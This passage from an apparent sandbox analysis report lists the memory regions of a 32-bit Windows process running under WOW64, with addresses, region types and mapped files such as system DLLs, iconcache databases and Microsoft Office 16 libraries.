0x11f30000 end_va = 0x11f30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f30000" filename = "" Region: id = 410 start_va = 0x11f40000 end_va = 0x11f41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f40000" filename = "" Region: id = 411 start_va = 0x11f50000 end_va = 0x11f51fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 412 start_va = 0x11f60000 end_va = 0x11f60fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 413 start_va = 0x11f90000 end_va = 0x1278ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f90000" filename = "" Region: id = 414 start_va = 0x12790000 end_va = 0x127cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012790000" filename = "" Region: id = 415 start_va = 0x127d0000 end_va = 0x128cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000127d0000" filename = "" Region: id = 416 start_va = 0x128d0000 end_va = 0x1290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000128d0000" filename = "" Region: id = 417 start_va = 0x12910000 end_va = 0x12a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012910000" filename = "" Region: id = 418 start_va = 0x12a10000 end_va = 0x12a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a10000" filename = "" Region: id = 419 start_va = 0x12a50000 end_va = 0x12b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a50000" filename = "" Region: id = 420 start_va = 0x12b50000 end_va = 0x12b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012b50000" filename = "" Region: id = 421 start_va = 0x12b90000 end_va = 0x12c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012b90000" filename = "" Region: id = 422 start_va = 0x12c90000 end_va = 0x12d65fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c90000" filename = "" Region: id = 423 start_va = 0x12d70000 end_va = 0x12daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012d70000" filename = "" Region: id = 424 start_va = 0x12db0000 end_va = 0x12dc1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 425 start_va = 0x12dd0000 end_va = 0x12dd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012dd0000" filename = "" Region: id = 426 start_va = 0x12de0000 end_va = 0x12e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012de0000" filename = "" Region: id = 427 start_va = 0x12e20000 end_va = 0x12f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012e20000" filename = "" Region: id = 428 start_va = 0x12f20000 end_va = 0x1301ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012f20000" filename = "" Region: id = 429 start_va = 0x13020000 end_va = 0x13020fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013020000" filename = "" Region: id = 430 start_va = 0x13030000 end_va = 0x13030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013030000" filename = "" Region: id = 431 start_va = 0x13040000 end_va = 0x13040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013040000" filename = "" Region: id = 432 start_va = 0x13050000 end_va = 0x13050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013050000" filename = "" Region: id = 433 start_va = 0x13060000 end_va = 0x13060fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013060000" filename = "" Region: id = 434 start_va = 0x13070000 end_va = 0x130a5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013070000" filename = "" Region: id = 435 start_va = 0x130b0000 end_va = 0x130b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000130b0000" filename = "" Region: id = 436 start_va = 0x130c0000 end_va = 0x130c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000130c0000" filename = "" Region: id = 437 start_va = 0x130d0000 end_va = 0x13105fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000130d0000" filename = "" Region: id = 438 start_va = 0x13110000 end_va = 0x13111fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013110000" filename = "" Region: id = 439 start_va = 0x13120000 end_va = 0x13121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013120000" filename = "" Region: id = 440 start_va = 0x13130000 end_va = 0x1316ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013130000" filename = "" Region: id = 441 start_va = 0x13170000 end_va = 0x13176fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\explorerframe.dll.mui") Region: id = 442 start_va = 0x13180000 end_va = 0x13183fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013180000" filename = "" Region: id = 443 start_va = 0x13190000 end_va = 0x13193fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013190000" filename = "" Region: id = 444 start_va = 0x131a0000 end_va = 0x131dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000131a0000" filename = "" Region: id = 445 start_va = 0x131e0000 end_va = 0x132dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000131e0000" filename = "" Region: id = 446 start_va = 0x132e0000 end_va = 0x132e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000132e0000" filename = "" Region: id = 447 start_va = 0x132f0000 end_va = 0x132f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000132f0000" filename = "" Region: id = 448 start_va = 0x13300000 end_va = 0x1333ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013300000" filename = "" Region: id = 449 start_va = 0x13340000 end_va = 0x1343ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013340000" filename = "" Region: id = 450 start_va = 0x13440000 end_va = 0x1347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013440000" filename = "" Region: id = 451 start_va = 0x13480000 end_va = 0x134bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013480000" filename = "" Region: id = 452 start_va = 0x134c0000 end_va = 0x134c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000134c0000" filename = "" Region: id = 453 start_va = 0x134d0000 end_va = 0x134d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000134d0000" filename = "" Region: id = 454 start_va = 0x134e0000 end_va = 0x134e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000134e0000" filename = "" Region: id = 455 start_va = 0x134f0000 end_va = 0x134f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000134f0000" filename = "" Region: id = 456 start_va = 0x13500000 end_va = 0x13500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013500000" filename = "" Region: id = 457 start_va = 0x13510000 end_va = 0x13511fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 458 start_va = 0x13520000 end_va = 0x13521fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013520000" filename = "" Region: id = 459 start_va = 0x13530000 end_va = 0x13530fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 460 start_va = 0x13540000 end_va = 0x13551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013540000" filename = "" Region: id = 461 start_va = 0x13560000 end_va = 0x13561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013560000" filename = "" Region: id = 462 start_va = 0x13570000 end_va = 0x13570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013570000" filename = "" Region: id = 463 start_va = 0x13580000 end_va = 0x1367ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013580000" filename = "" Region: id = 464 start_va = 0x13680000 end_va = 0x13680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013680000" filename = "" Region: id = 465 start_va = 0x13690000 end_va = 0x13693fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013690000" filename = "" Region: id = 466 start_va = 0x136c0000 end_va = 0x13707fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000136c0000" filename = "" Region: id = 467 start_va = 0x13710000 end_va = 0x1390ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013710000" filename = "" Region: id = 468 start_va = 0x13910000 end_va = 0x13dedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013910000" filename = "" Region: id = 469 start_va = 0x13df0000 end_va = 0x13e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013df0000" filename = "" Region: id = 470 start_va = 0x13e30000 end_va = 0x13e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e30000" filename = "" Region: id = 471 start_va = 0x13ea0000 end_va = 0x13eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013ea0000" filename = "" Region: id = 472 start_va = 0x13f70000 end_va = 0x13f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013f70000" filename = "" Region: id = 473 start_va = 0x13f80000 end_va = 0x13f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013f80000" filename = "" Region: id = 474 start_va = 0x13f90000 end_va = 0x14316fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f90000" filename = "" Region: id = 475 start_va = 0x14320000 end_va = 0x146a6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014320000" filename = "" Region: id = 476 start_va = 0x146b0000 end_va = 0x147affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000146b0000" filename = "" Region: id = 477 start_va = 0x147b0000 end_va = 0x148affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000147b0000" filename = "" Region: id = 478 start_va = 0x148b0000 end_va = 0x1498ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 479 start_va = 0x14990000 end_va = 0x14a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014990000" filename = "" Region: id = 480 start_va = 0x14a90000 end_va = 0x14b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014a90000" filename = "" Region: id = 481 start_va = 0x14b90000 end_va = 0x14c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014b90000" filename = "" Region: id = 482 start_va = 0x14c90000 end_va = 0x14d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014c90000" filename = "" Region: id = 483 start_va = 0x14d90000 end_va = 0x14f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014d90000" filename = "" Region: id = 484 start_va = 0x14f90000 end_va = 0x1518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014f90000" filename = "" Region: id = 485 start_va = 0x15190000 end_va = 0x1528ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015190000" filename = "" Region: id = 486 start_va = 0x15290000 end_va = 0x1538ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000015290000" filename = "" Region: id = 487 start_va = 0x15390000 end_va = 0x154e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000015390000" filename = "" Region: id = 488 start_va = 0x34400000 end_va = 0x3440ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034400000" filename = "" Region: id = 489 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 490 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 491 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 492 start_va = 0x6a680000 end_va = 0x6a721fff monitored = 0 entry_point = 0x6a6be8b0 region_type = mapped_file name = "windows.storage.search.dll" filename = "\\Windows\\SysWOW64\\Windows.Storage.Search.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.search.dll") Region: id = 493 start_va = 0x6a730000 end_va = 0x6a73ffff monitored = 0 entry_point = 0x6a7334d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 494 start_va = 0x6a740000 end_va = 0x6a751fff monitored = 0 entry_point = 0x6a743d40 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 495 start_va = 0x6a760000 end_va = 0x6a768fff monitored = 0 entry_point = 0x6a761db0 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 496 start_va = 0x6a770000 end_va = 0x6a785fff monitored = 0 entry_point = 0x6a7721d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 497 start_va = 0x6a790000 end_va = 0x6a797fff monitored = 0 entry_point = 0x6a791e20 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\SysWOW64\\IconCodecService.dll" (normalized: "c:\\windows\\syswow64\\iconcodecservice.dll") Region: id = 498 start_va = 0x6a7a0000 end_va = 0x6a7acfff monitored = 0 entry_point = 0x6a7a7d80 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\SysWOW64\\atlthunk.dll" (normalized: "c:\\windows\\syswow64\\atlthunk.dll") Region: id = 499 start_va = 0x6a7b0000 end_va = 0x6a831fff monitored = 0 entry_point = 0x6a7ec7c0 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\SysWOW64\\StructuredQuery.dll" (normalized: "c:\\windows\\syswow64\\structuredquery.dll") Region: id = 500 start_va = 0x6a840000 end_va = 0x6aad2fff monitored = 0 entry_point = 0x6a927e80 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\SysWOW64\\msftedit.dll" (normalized: "c:\\windows\\syswow64\\msftedit.dll") Region: id = 501 start_va = 0x6aae0000 end_va = 0x6ab5afff monitored = 0 entry_point = 0x6ab04d80 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 502 start_va = 0x6ab60000 end_va = 0x6acc6fff monitored = 0 entry_point = 0x6abdb9d0 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 503 start_va = 0x6acd0000 end_va = 0x6b109fff monitored = 0 entry_point = 0x6ad7f860 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll") Region: id = 504 start_va = 0x6b110000 end_va = 0x6b174fff monitored = 0 entry_point = 0x6b146fb0 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\SysWOW64\\msvcp110_win.dll" (normalized: "c:\\windows\\syswow64\\msvcp110_win.dll") Region: id = 505 start_va = 0x6b180000 end_va = 0x6b1c9fff monitored = 0 entry_point = 0x6b18a100 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\SysWOW64\\policymanager.dll" (normalized: "c:\\windows\\syswow64\\policymanager.dll") Region: id = 506 start_va = 0x6b1d0000 end_va = 0x6b218fff monitored = 0 entry_point = 0x6b1d6450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 507 start_va = 0x6b220000 end_va = 0x6b29cfff monitored = 0 entry_point = 0x6b243ef0 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\tiptsf.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 508 start_va = 0x6b2a0000 end_va = 0x6b4c8fff monitored = 0 entry_point = 0x6b2d9bb4 region_type = mapped_file name = "wxpnse.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\wxpnse.dll") Region: id = 509 start_va = 0x6b4d0000 end_va = 0x6b561fff monitored = 0 entry_point = 0x6b4ddd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 510 start_va = 0x6b570000 end_va = 0x6b589fff monitored = 0 entry_point = 0x6b573270 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 511 start_va = 0x6b590000 end_va = 0x6b5cdfff monitored = 0 entry_point = 0x6b5aab30 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\SysWOW64\\thumbcache.dll" (normalized: "c:\\windows\\syswow64\\thumbcache.dll") Region: id = 512 start_va = 0x6b5d0000 end_va = 0x6b5f2fff monitored = 0 entry_point = 0x6b5e69b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 513 start_va = 0x6b600000 end_va = 0x6b651fff monitored = 0 entry_point = 0x6b628290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 514 start_va = 0x6b660000 end_va = 0x6b791fff monitored = 0 entry_point = 0x6b6cbf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 515 start_va = 0x6b7a0000 end_va = 0x6b7b5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 516 start_va = 0x6b7c0000 end_va = 0x6b932fff monitored = 0 entry_point = 0x6b86d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 517 start_va = 0x6b940000 end_va = 0x6b9a6fff monitored = 0 entry_point = 0x6b955a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 518 start_va = 0x6b9b0000 end_va = 0x6b9d0fff monitored = 0 entry_point = 0x6b9bbdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 519 start_va = 0x6b9e0000 end_va = 0x6c1d4fff monitored = 0 entry_point = 0x6ba45279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\chart.dll") Region: id = 520 start_va = 0x6c1e0000 end_va = 0x6c272fff monitored = 0 entry_point = 0x6c200ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 521 start_va = 0x6c280000 end_va = 0x6c421fff monitored = 0 entry_point = 0x6c281000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 522 start_va = 0x6c430000 end_va = 0x6c4acfff monitored = 0 entry_point = 0x6c440db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 523 start_va = 0x6c4b0000 end_va = 0x6c50bfff monitored = 0 entry_point = 0x6c4b8880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 524 start_va = 0x6c510000 end_va = 0x6c53bfff monitored = 0 entry_point = 0x6c5324b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 525 start_va = 0x6c540000 end_va = 0x6c583fff monitored = 0 entry_point = 0x6c55aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 526 start_va = 0x6c590000 end_va = 0x6c59efff monitored = 0 entry_point = 0x6c592a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 527 start_va = 0x6c5a0000 end_va = 0x6c928fff monitored = 0 entry_point = 0x6c63cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 528 start_va = 0x6c930000 end_va = 0x6d6e1fff monitored = 0 entry_point = 0x6c931000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 529 start_va = 0x6d6f0000 end_va = 0x6d70cfff monitored = 0 entry_point = 0x6d6f7240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 530 start_va = 0x6d710000 end_va = 0x6d72ffff monitored = 0 entry_point = 0x6d722810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 531 start_va = 0x6d730000 end_va = 0x6d735fff monitored = 0 entry_point = 0x6d731490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 532 start_va = 0x6d740000 end_va = 0x6dcd7fff monitored = 0 entry_point = 0x6d741000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 533 start_va = 0x6dce0000 end_va = 0x6e3f4fff monitored = 0 entry_point = 0x6dce1000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 534 start_va = 0x6e400000 end_va = 0x6e701fff monitored = 0 entry_point = 0x6e401000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 535 start_va = 0x6e710000 end_va = 0x6e8e4fff monitored = 0 entry_point = 0x6e711000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 536 start_va = 0x6e8f0000 end_va = 0x6ea5afff monitored = 0 entry_point = 0x6e95e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 537 start_va = 0x6ea60000 end_va = 0x6f651fff monitored = 0 entry_point = 0x6ea61000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\oart.dll") Region: id = 538 start_va = 0x6f660000 end_va = 0x6f740fff monitored = 0 entry_point = 0x6f68e6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 539 start_va = 0x6f750000 end_va = 0x6f7bffff monitored = 0 entry_point = 0x6f78ec20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\SysWOW64\\msvcp140.dll" (normalized: "c:\\windows\\syswow64\\msvcp140.dll") Region: id = 540 start_va = 0x6f7c0000 end_va = 0x6f7d3fff monitored = 0 entry_point = 0x6f7ce290 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 541 start_va = 0x6f7e0000 end_va = 0x6f7eafff monitored = 0 entry_point = 0x6f7e2150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 542 start_va = 0x6f7f0000 end_va = 0x6f7f8fff monitored = 0 entry_point = 0x6f7f3830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 543 start_va = 0x6f800000 end_va = 0x6f833fff monitored = 0 entry_point = 0x6f818280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 544 start_va = 0x6f840000 end_va = 0x6f847fff monitored = 0 entry_point = 0x6f8417b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 545 start_va = 0x6f850000 end_va = 0x6f8a8fff monitored = 0 entry_point = 0x6f860780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 546 start_va = 0x6f8b0000 end_va = 0x6f8dcfff monitored = 0 entry_point = 0x6f8c2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 547 start_va = 0x6fa40000 end_va = 0x6fc5bfff monitored = 0 entry_point = 0x6fc0bc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 548 start_va = 0x6fc60000 end_va = 0x6fdaafff monitored = 0 entry_point = 0x6fcc1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: 